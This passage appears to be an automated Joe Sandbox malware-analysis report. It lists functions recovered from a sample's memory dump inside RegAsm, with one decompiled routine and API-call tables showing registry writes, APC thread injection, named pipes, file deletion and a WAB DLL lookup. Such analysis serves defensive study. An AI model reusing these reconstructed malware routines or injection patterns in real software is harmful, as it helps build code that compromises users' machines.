HeapFree.KERNEL32(00000000,00000000,?,?,03F1CD34), ref: 03F0F5B7
RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,?,?,03F1CD34), ref: 03F0F5C9

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Closelstrlen$HeapOpenQueryValuelstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
String ID:
API String ID: 2243210721-0
Opcode ID: 2a31586865ab62b28248835d0d7380827e206c9e2b5b79235803a6d041cf12af
Instruction ID: e77d6d6ba37581ae1515e7ca058200228da77d1e5c63daa0bf5932567d6b7da0
Opcode Fuzzy Hash: 2a31586865ab62b28248835d0d7380827e206c9e2b5b79235803a6d041cf12af
Instruction Fuzzy Hash: 7F515F7690021AEFDB21EFE8DC54EAE77BDEF14300B144165F901E71A4DB31DA11AB60

Uniqueness

Uniqueness Score: -1.00%

Function 010A3F52, Relevance: 16.6, APIs: 11, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E010A3F52(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				WCHAR* _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
				WCHAR* _t58;
				signed int _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t70;
				void* _t72;
				void* _t75;
				void* _t76;
				WCHAR* _t80;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t92;
				signed int _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t107;
				intOrPtr* _t115;
				void* _t119;
				WCHAR* _t125;

				_t58 =  *0x10aa38c; // 0x3409bd8
				_v24 = _t58;
				_v28 = 8;
				_v20 = GetTickCount();
				_t60 = E010A4885();
				_t103 = 5;
				_t98 = _t60 % _t103 + 6;
				_t62 = E010A4885();
				_t117 = _t62 % _t103 + 6;
				_v32 = _t62 % _t103 + 6;
				_t64 = E010A549F(_t60 % _t103 + 6);
				_v16 = _t64;
				if(_t64 != 0) {
					_t66 = E010A549F(_t117);
					_v12 = _t66;
					if(_t66 != 0) {
						_push(5);
						_t104 = 0xa;
						_t119 = E010A3973(_t104,  &_v20);
						if(_t119 == 0) {
							_t119 = 0x10a91ac;
						}
						_t70 = E010A6A50(_v24);
						_v8 = _t70;
						if(_t70 != 0) {
							_t115 = __imp__;
							_t72 =  *_t115(_t119);
							_t75 =  *_t115(_v8);
							_t76 =  *_t115(_a4);
							_t80 = E010A4573(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
							_v24 = _t80;
							if(_t80 != 0) {
								_t105 =  *0x10aa2d4; // 0x235d5a8
								_t28 = _t105 + 0x10abab8; // 0x530025
								wsprintfW(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
								_push(4);
								_t107 = 5;
								_t83 = E010A3973(_t107,  &_v20);
								_a8 = _t83;
								if(_t83 == 0) {
									_a8 = 0x10a91b0;
								}
								_t84 =  *_t115(_a8);
								_t85 =  *_t115(_v8);
								_t86 =  *_t115(_a4);
								_t125 = E010A4573(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
								if(_t125 == 0) {
									E010A2625(_v24);
								} else {
									_t92 =  *0x10aa2d4; // 0x235d5a8
									_t44 = _t92 + 0x10abc30; // 0x73006d
									wsprintfW(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
									 *_a16 = _v24;
									_v28 = _v28 & 0x00000000;
									 *_a20 = _t125;
								}
							}
							E010A2625(_v8);
						}
						E010A2625(_v12);
					}
					E010A2625(_v16);
				}
				return _v28;
			}

0x010a3f58
0x010a3f60
0x010a3f63
0x010a3f70
0x010a3f73
0x010a3f7a
0x010a3f81
0x010a3f84
0x010a3f91
0x010a3f94
0x010a3f97
0x010a3f9e
0x010a3fa1
0x010a3fa9
0x010a3fb0
0x010a3fb3
0x010a3fb9
0x010a3fbd
0x010a3fc6
0x010a3fca
0x010a3fcc
0x010a3fcc
0x010a3fd4
0x010a3fdb
0x010a3fde
0x010a3fe4
0x010a3feb
0x010a3ffc
0x010a4003
0x010a4015
0x010a401c
0x010a401f
0x010a4028
0x010a403a
0x010a4050
0x010a4055
0x010a4059
0x010a405d
0x010a4064
0x010a4067
0x010a4069
0x010a4069
0x010a4073
0x010a407c
0x010a4083
0x010a409f
0x010a40a3
0x010a40dc
0x010a40a5
0x010a40a8
0x010a40b0
0x010a40c1
0x010a40c9
0x010a40d1
0x010a40d5
0x010a40d5
0x010a40a3
0x010a40e4
0x010a40e4
0x010a40ec
0x010a40ec
0x010a40f4
0x010a40f4
0x010a4100

APIs

GetTickCount.KERNEL32 ref: 010A3F6A
lstrlen.KERNEL32(00000000,00000005), ref: 010A3FEB
lstrlen.KERNEL32(?), ref: 010A3FFC
lstrlen.KERNEL32(00000000), ref: 010A4003
lstrlenW.KERNEL32(80000002), ref: 010A400A
wsprintfW.USER32 ref: 010A4050
lstrlen.KERNEL32(?,00000004), ref: 010A4073
lstrlen.KERNEL32(?), ref: 010A407C
lstrlen.KERNEL32(?), ref: 010A4083
lstrlenW.KERNEL32(?), ref: 010A408A
wsprintfW.USER32 ref: 010A40C1

Part of subcall function 010A2625: RtlFreeHeap.NTDLL(00000000,00000000,010A5AE0,00000000,00000000,00000000,00000000,?,?,?,?,?,010A11F4,00000000), ref: 010A2631

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: lstrlen$wsprintf$CountFreeHeapTick
String ID:
API String ID: 822878831-0
Opcode ID: 4663058f08dc71e7a5ec8a53d37177a57982e6663ba81109e55f76e5c624c88c
Instruction ID: c9ed27338f5026c87d39d8d70e8d520b9cf8ec43276f766d5e2af6e6eb2a3c51
Opcode Fuzzy Hash: 4663058f08dc71e7a5ec8a53d37177a57982e6663ba81109e55f76e5c624c88c
Instruction Fuzzy Hash: FD516D36E00119EBCF22AFE8DC44EDE7BB5EF48354F494064FA44A7250DB768A21DB94

Uniqueness

Uniqueness Score: -1.00%

Function 03F13820, Relevance: 16.6, APIs: 11, Instructions: 144memoryregistryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 03F13856
RtlAllocateHeap.NTDLL(00000000,00000104), ref: 03F1386B
RegCreateKeyA.ADVAPI32(80000001,?), ref: 03F13893
HeapFree.KERNEL32(00000000,00000001), ref: 03F138D4
HeapFree.KERNEL32(00000000,?), ref: 03F138E4
RtlAllocateHeap.NTDLL(00000000,03F0ADF7), ref: 03F138F7
RtlAllocateHeap.NTDLL(00000000,03F0ADF7), ref: 03F13906
HeapFree.KERNEL32(00000000,?,?,03F0ADF7,?,00000001,?,?), ref: 03F13950
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,03F0ADF7,?,00000001), ref: 03F13974
HeapFree.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,?,?,03F0ADF7,?,00000001), ref: 03F13999
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,03F0ADF7,?,00000001), ref: 03F139AE

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heap$Free$Allocate$CloseCreate
String ID:
API String ID: 4126010716-0
Opcode ID: 49d6dbc91c7c87a7d0e26598982f5e00dba6acfbfbfe9a1fb7396ad1ebb2538e
Instruction ID: f67e4b68118f44920702da66042d8bcff13e44bb286ccb209ff4408423490721
Opcode Fuzzy Hash: 49d6dbc91c7c87a7d0e26598982f5e00dba6acfbfbfe9a1fb7396ad1ebb2538e
Instruction Fuzzy Hash: 7F51B2B5C0010EEFDF11DFD5E8948EEBBBAFB08345B54406AE914A2264D3319E94DF60

Uniqueness

Uniqueness Score: -1.00%

Function 03F0299C, Relevance: 16.6, APIs: 11, Instructions: 102registrymemorystringCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,00000001), ref: 03F029C0

Part of subcall function 03F06D31: RegQueryValueExW.ADVAPI32(00000000,?,00000000,03F0F43D,00000000,?,74B606E0,?,03F0F43D,?,00000000,?,?,?,03F1CD34), ref: 03F06D58
Part of subcall function 03F06D31: RegQueryValueExW.ADVAPI32(80000001,80000001,00000000,00000000,00000000,80000001,80000001,80000001,?,?,03F1CD34), ref: 03F06D81
Part of subcall function 03F06D31: RegCloseKey.ADVAPI32(?,03F1CD34), ref: 03F06DB8

lstrcmpiW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,03F1CD34), ref: 03F029EF
lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,03F1CD34), ref: 03F02A00
RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 03F02A3A
RegSetValueExA.ADVAPI32(00000004,?,00000000,00000004,?,00000004,?,?,03F1CD34), ref: 03F02A5C
RegCloseKey.ADVAPI32(?,?,?,03F1CD34), ref: 03F02A65
RtlEnterCriticalSection.NTDLL(00000000), ref: 03F02A7B
HeapFree.KERNEL32(00000000,?,?,?,03F1CD34), ref: 03F02A90
RtlLeaveCriticalSection.NTDLL(00000000), ref: 03F02AA4
HeapFree.KERNEL32(00000000,?,?,?,03F1CD34), ref: 03F02AB9
RegCloseKey.ADVAPI32(?,?,?,03F1CD34), ref: 03F02AC2

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CloseValue$CriticalFreeHeapQuerySection$CreateEnterLeaveOpenlstrcmpilstrlen
String ID:
API String ID: 3028791806-0
Opcode ID: ed033a58b317959e232c6be4595d585bed70d8ca0978ac08e5624bcbfc41992c
Instruction ID: 10f30f230997a0ac5c0edf982f9985c1d393d4e412a195f6f89157b3285375c1
Opcode Fuzzy Hash: ed033a58b317959e232c6be4595d585bed70d8ca0978ac08e5624bcbfc41992c
Instruction Fuzzy Hash: C9314975900109FFCB21EF98DC58D9EBBB9FB58301B144565F905E21A8DB719A41EB20

Uniqueness

Uniqueness Score: -1.00%

Function 03F225C8, Relevance: 16.6, APIs: 11, Instructions: 80memoryfileCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 03F225DF
GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,?,?,03F10629,?,00000094,00000001,?,00000094,00000000,?,?,00000000,?), ref: 03F225F1
StrChrA.SHLWAPI(00000000,0000003A,?,?,?,03F10629,?,00000094,00000001,?,00000094,00000000,?,?,00000000,?), ref: 03F225FE
wsprintfA.USER32 ref: 03F22619
CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,?,?,00000000,?,00000094), ref: 03F2262F
GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 03F22648
WriteFile.KERNEL32(00000000,00000000), ref: 03F22650
GetLastError.KERNEL32 ref: 03F2265E
CloseHandle.KERNEL32(00000000), ref: 03F22667
GetLastError.KERNEL32(?,?,?,03F10629,?,00000094,00000001,?,00000094,00000000,?,?,00000000,?,00000094), ref: 03F22678
HeapFree.KERNEL32(00000000,00000000,?,?,?,03F10629,?,00000094,00000001,?,00000094,00000000,?,?,00000000,?), ref: 03F22688

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
String ID:
API String ID: 3873609385-0
Opcode ID: 18f80672523c08553f587497a1a076cee763a8f0396fd489c7003638998ddb54
Instruction ID: 9f975873dc40a2dae45fcd3fad554e078d98468a9bad380e930afbc496d03408
Opcode Fuzzy Hash: 18f80672523c08553f587497a1a076cee763a8f0396fd489c7003638998ddb54
Instruction Fuzzy Hash: 2A11DF7224122DFFD230BBA4EC9CE7B3F6CEB112A6F040124F902D2194DBA50C45DAB2

Uniqueness

Uniqueness Score: -1.00%

Function 03F0E0C4, Relevance: 15.3, APIs: 10, Instructions: 279memorythreadCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 03F0E13B
VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 03F0E15A

Part of subcall function 03F13FEF: wsprintfA.USER32 ref: 03F14002
Part of subcall function 03F13FEF: CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 03F14014
Part of subcall function 03F13FEF: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 03F1403E
Part of subcall function 03F13FEF: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 03F14051
Part of subcall function 03F13FEF: CloseHandle.KERNEL32(?), ref: 03F1405A

GetLastError.KERNEL32 ref: 03F0E42D
RtlEnterCriticalSection.NTDLL(?), ref: 03F0E43D
RtlLeaveCriticalSection.NTDLL(?), ref: 03F0E44E
RtlExitUserThread.NTDLL(?), ref: 03F0E45C

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: AllocCriticalSectionTimerVirtualWaitable$CloseCreateEnterErrorExitHandleLastLeaveMultipleObjectsThreadUserWaitwsprintf
String ID:
API String ID: 1258333524-0
Opcode ID: f817a405c3c06aa24e452efa0e22ee7077ef6b138ceee88fdbafb0a94981133f
Instruction ID: c2629dba22fff5d39ff84686702d7dfc0ec62ea0fd31f482f1b93c13a3ff46d9
Opcode Fuzzy Hash: f817a405c3c06aa24e452efa0e22ee7077ef6b138ceee88fdbafb0a94981133f
Instruction Fuzzy Hash: 58B17974900A0AEFEB30DF65CC88AAABBB9FF18305F544969F919D21A0D731D854DF10

Uniqueness

Uniqueness Score: -1.00%

Function 03F04DFB, Relevance: 15.2, APIs: 10, Instructions: 186stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(043ABA30,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 03F04E1E
lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 03F04E2D
lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 03F04E3A
lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 03F04E52
lstrlen.KERNEL32(0000000D,00000000,00000000,00000000,00000000,00000000,00000000), ref: 03F04E5E
RtlAllocateHeap.NTDLL(00000000,?), ref: 03F04E7A
wsprintfA.USER32 ref: 03F04F5C
memcpy.NTDLL(00000000,?,?), ref: 03F04FA9
InterlockedExchange.KERNEL32(03F2C0BC,00000000), ref: 03F04FC7
HeapFree.KERNEL32(00000000,00000000), ref: 03F05008

Part of subcall function 03F17E47: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 03F17E70
Part of subcall function 03F17E47: memcpy.NTDLL(00000000,?,?), ref: 03F17E83
Part of subcall function 03F17E47: RtlEnterCriticalSection.NTDLL(03F2C328), ref: 03F17E94
Part of subcall function 03F17E47: RtlLeaveCriticalSection.NTDLL(03F2C328), ref: 03F17EA9
Part of subcall function 03F17E47: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 03F17EE1

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
String ID:
API String ID: 4198405257-0
Opcode ID: f80ea3135da6489d355cdd6043cd151e04748f3c18c813d6912ca8591f9f0459
Instruction ID: 688155c0017248f9fdd3bed7ddbd974ffdd856399ccb7eedf7446777f66e5770
Opcode Fuzzy Hash: f80ea3135da6489d355cdd6043cd151e04748f3c18c813d6912ca8591f9f0459
Instruction Fuzzy Hash: 2061697290020AEFCF20EFA9DC94EAE7BA9FB04304F044169F915DB290D774AA55DF90

Uniqueness

Uniqueness Score: -1.00%

Function 03F08F78, Relevance: 15.1, APIs: 10, Instructions: 94filememorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 03F23269: memset.NTDLL ref: 03F2328B
Part of subcall function 03F23269: CloseHandle.KERNEL32(?,?,?,?,?), ref: 03F23335

MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 03F08FBF
CloseHandle.KERNEL32(?), ref: 03F08FCB
PathFindFileNameW.SHLWAPI(?), ref: 03F08FDB
lstrlenW.KERNEL32(00000000), ref: 03F08FE5
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 03F08FF6
wcstombs.NTDLL ref: 03F09007
lstrlen.KERNEL32(?), ref: 03F09014
UnmapViewOfFile.KERNEL32(?,?,?,?,00000001), ref: 03F0904A
HeapFree.KERNEL32(00000000,00000000), ref: 03F0905C
DeleteFileW.KERNEL32(?), ref: 03F0906A

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
String ID:
API String ID: 2256351002-0
Opcode ID: 1fbc27fb2d6339a9772d5600210daff716ad19ca8adc6f2e63686563704f7e06
Instruction ID: 8cd7fb446f41e7c19496ac7ec69801e3b02b3a9c11bdddf50f61ace145a7dcf4
Opcode Fuzzy Hash: 1fbc27fb2d6339a9772d5600210daff716ad19ca8adc6f2e63686563704f7e06
Instruction Fuzzy Hash: E331387590010EEFCF21EFA8DD888AFBB79FF44351B044069F911E21A5DBB19A51EB60

Uniqueness

Uniqueness Score: -1.00%

Function 03F13D64, Relevance: 15.1, APIs: 10, Instructions: 78stringfilememoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 03F13D74
CreateFileW.KERNEL32(03F1044B,80000000,00000003,03F2C1A8,00000003,00000000,00000000,?,03F1044B,?,?,?,00000000), ref: 03F13D91
GetLastError.KERNEL32(?,03F1044B,?,?,?,00000000), ref: 03F13E39

Part of subcall function 03F16DB5: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,?,00000000,?,69B25F44,?,00000000,00000000), ref: 03F16DEB
Part of subcall function 03F16DB5: lstrcpy.KERNEL32(00000000,00000000), ref: 03F16E0F
Part of subcall function 03F16DB5: lstrcat.KERNEL32(00000000,00000000), ref: 03F16E17

GetFileSize.KERNEL32(03F1044B,00000000,?,00000001,?,03F1044B,?,?,?,00000000), ref: 03F13DC4
CreateFileMappingA.KERNEL32(03F1044B,03F2C1A8,00000002,00000000,00000000,03F1044B), ref: 03F13DD8
lstrlen.KERNEL32(03F1044B,?,03F1044B,?,?,?,00000000), ref: 03F13DF4
lstrcpy.KERNEL32(?,03F1044B), ref: 03F13E04
GetLastError.KERNEL32(?,03F1044B,?,?,?,00000000), ref: 03F13E0C
HeapFree.KERNEL32(00000000,03F1044B,?,03F1044B,?,?,?,00000000), ref: 03F13E1F
CloseHandle.KERNEL32(03F1044B,?,00000001,?,03F1044B), ref: 03F13E31

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
String ID:
API String ID: 194907169-0
Opcode ID: 3805ab324223f8dfb76f02e7061302c3ed0e8061e9261da1e34dc4be40bdec91
Instruction ID: 288d262c472929c0bac380e85b256af5877bd0c0a5db97a12001da6ddcb6372c
Opcode Fuzzy Hash: 3805ab324223f8dfb76f02e7061302c3ed0e8061e9261da1e34dc4be40bdec91
Instruction Fuzzy Hash: A3214B7580020CFFDB20EFA4E848A9EBFB9FB18351F10806AF915E6264D7758E54DB50

Uniqueness

Uniqueness Score: -1.00%

Function 03F1E380, Relevance: 15.1, APIs: 10, Instructions: 68threadprocesslibraryCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000001,?,00000000,00000000,00000000,00000000,00000000,74E5F5B0,03F21D54,?,00000001), ref: 03F1E3A6
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 03F1E3B2
GetModuleHandleA.KERNEL32(?,043A9732,?,00000000,00000000), ref: 03F1E3D2
GetProcAddress.KERNEL32(00000000), ref: 03F1E3D9
Thread32First.KERNEL32(00000001,0000001C), ref: 03F1E3E9
OpenThread.KERNEL32(001F03FF,00000000,00000000), ref: 03F1E404
QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 03F1E415
CloseHandle.KERNEL32(00000000), ref: 03F1E41C
Thread32Next.KERNEL32(00000001,0000001C), ref: 03F1E425
CloseHandle.KERNEL32(00000001), ref: 03F1E431

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
String ID:
API String ID: 2341152533-0
Opcode ID: 4f67a6704b891faa4c70329098beafab594c58082e918af032cab5b3c7c92f01
Instruction ID: eafdba055166f002f2e7ff167d947cd1522f667e6bb8778ecafe01c4bf102927
Opcode Fuzzy Hash: 4f67a6704b891faa4c70329098beafab594c58082e918af032cab5b3c7c92f01
Instruction Fuzzy Hash: 9E21607690021DEFDF10EFA4EC84DEEBB7DEB18355B04412AFA01E6150D771A9519BA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F1F92A, Relevance: 15.1, APIs: 10, Instructions: 59sleepsynchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?,03F1330E), ref: 03F1F93F

Part of subcall function 03F01D99: InterlockedExchange.KERNEL32(?,000000FF), ref: 03F01DA0

WaitForSingleObject.KERNEL32(?,000000FF,?,?,03F1330E), ref: 03F1F95F
CloseHandle.KERNEL32(00000000,?,03F1330E), ref: 03F1F968
CloseHandle.KERNEL32(?,?,?,03F1330E), ref: 03F1F972
RtlEnterCriticalSection.NTDLL(?), ref: 03F1F97A
RtlLeaveCriticalSection.NTDLL(?), ref: 03F1F992
Sleep.KERNEL32(000001F4), ref: 03F1F9A1
CloseHandle.KERNEL32(?), ref: 03F1F9AE
LocalFree.KERNEL32(?), ref: 03F1F9B9
RtlDeleteCriticalSection.NTDLL(?), ref: 03F1F9C3

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
String ID:
API String ID: 1408595562-0
Opcode ID: 10e1a5807f76612e94951c06f85cc813149d53d4384a5bdc3fade78ea69d736a
Instruction ID: 422446fd5a0aea92af565256e235afbbd75a5ab155b67ea9cb326c2487f1176a
Opcode Fuzzy Hash: 10e1a5807f76612e94951c06f85cc813149d53d4384a5bdc3fade78ea69d736a
Instruction Fuzzy Hash: 16115A3650071AEFCB31FB66EC5896AB7BCFF147153880A28E582D3464CB76F4548B24

Uniqueness

Uniqueness Score: -1.00%

Function 03F1C9DE, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 125memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000001,00000000,?,?,03F04121,?,00000001,?,?,00000000), ref: 03F1C9F5
lstrlen.KERNEL32(?), ref: 03F1CA05
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 03F1CA39
RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 03F1CA64
memcpy.NTDLL(00000000,?,?), ref: 03F1CA83
HeapFree.KERNEL32(00000000,00000000), ref: 03F1CAE4
memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 03F1CB06

Strings

W, xrefs: 03F1CB32

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heap$Allocatelstrlenmemcpy$Free
String ID: W
API String ID: 3204852930-655174618
Opcode ID: 49f3c5d57b5ddae0e9b9b683b2a740258f56a62353d31bb41b6374fbc0af535f
Instruction ID: 45b230e3d164174e14e03d4b02b2a7de9c801a5f3b6ff2bec2da7417002486e3
Opcode Fuzzy Hash: 49f3c5d57b5ddae0e9b9b683b2a740258f56a62353d31bb41b6374fbc0af535f
Instruction Fuzzy Hash: 35413C72D4021AEFDF11DF95EC84AAEBBB9FF08344F144069E914E7210E7719A649FA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F0A873, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89memorystringpipeCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(03F046D1,00000000,?,00000000,?,?,03F046D1,00000035,00000000,?,00000000), ref: 03F0A8A3
RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 03F0A8B9
memcpy.NTDLL(00000010,03F046D1,00000000,?,?,03F046D1,00000035,00000000), ref: 03F0A8EF
memcpy.NTDLL(00000010,00000000,00000035,?,?,03F046D1,00000035), ref: 03F0A90A
CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 03F0A928
GetLastError.KERNEL32(?,?,03F046D1,00000035), ref: 03F0A932
HeapFree.KERNEL32(00000000,00000000,?,?,03F046D1,00000035), ref: 03F0A955

Strings

(, xrefs: 03F0A93C

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
String ID: (
API String ID: 2237239663-3887548279
Opcode ID: 909c1a7694921b0e4dc85f55305db1fe1ab4908e7a479f51c90e98b1e7559889
Instruction ID: 4fa1b8ac32bece7319f55b13e420ba0ab6042dd710a6a449ec2621816924bda6
Opcode Fuzzy Hash: 909c1a7694921b0e4dc85f55305db1fe1ab4908e7a479f51c90e98b1e7559889
Instruction Fuzzy Hash: 4531B136A0030AEFCF20EFA9DC44A9BBBB8EB54350F144429FD45D2290E370DA54EB60

Uniqueness

Uniqueness Score: -1.00%

Function 03F0E463, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 03F0E47E
RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 03F0E536

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 03F0E4CC
GetProcAddress.KERNEL32(00000000,?), ref: 03F0E4E5
GetLastError.KERNEL32(?,00000008,?,00000001), ref: 03F0E504
FreeLibrary.KERNEL32(00000000,?,00000008,?,00000001), ref: 03F0E516
GetLastError.KERNEL32(?,00000008,?,00000001), ref: 03F0E51E

Strings

Software\Microsoft\WAB\DLLPath, xrefs: 03F0E46F

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
String ID: Software\Microsoft\WAB\DLLPath
API String ID: 1628847533-3156921957
Opcode ID: 35e639cc85263a1f5b51e9cea0d6abf5d6fe619002d0b41e6534cdc83ec5d216
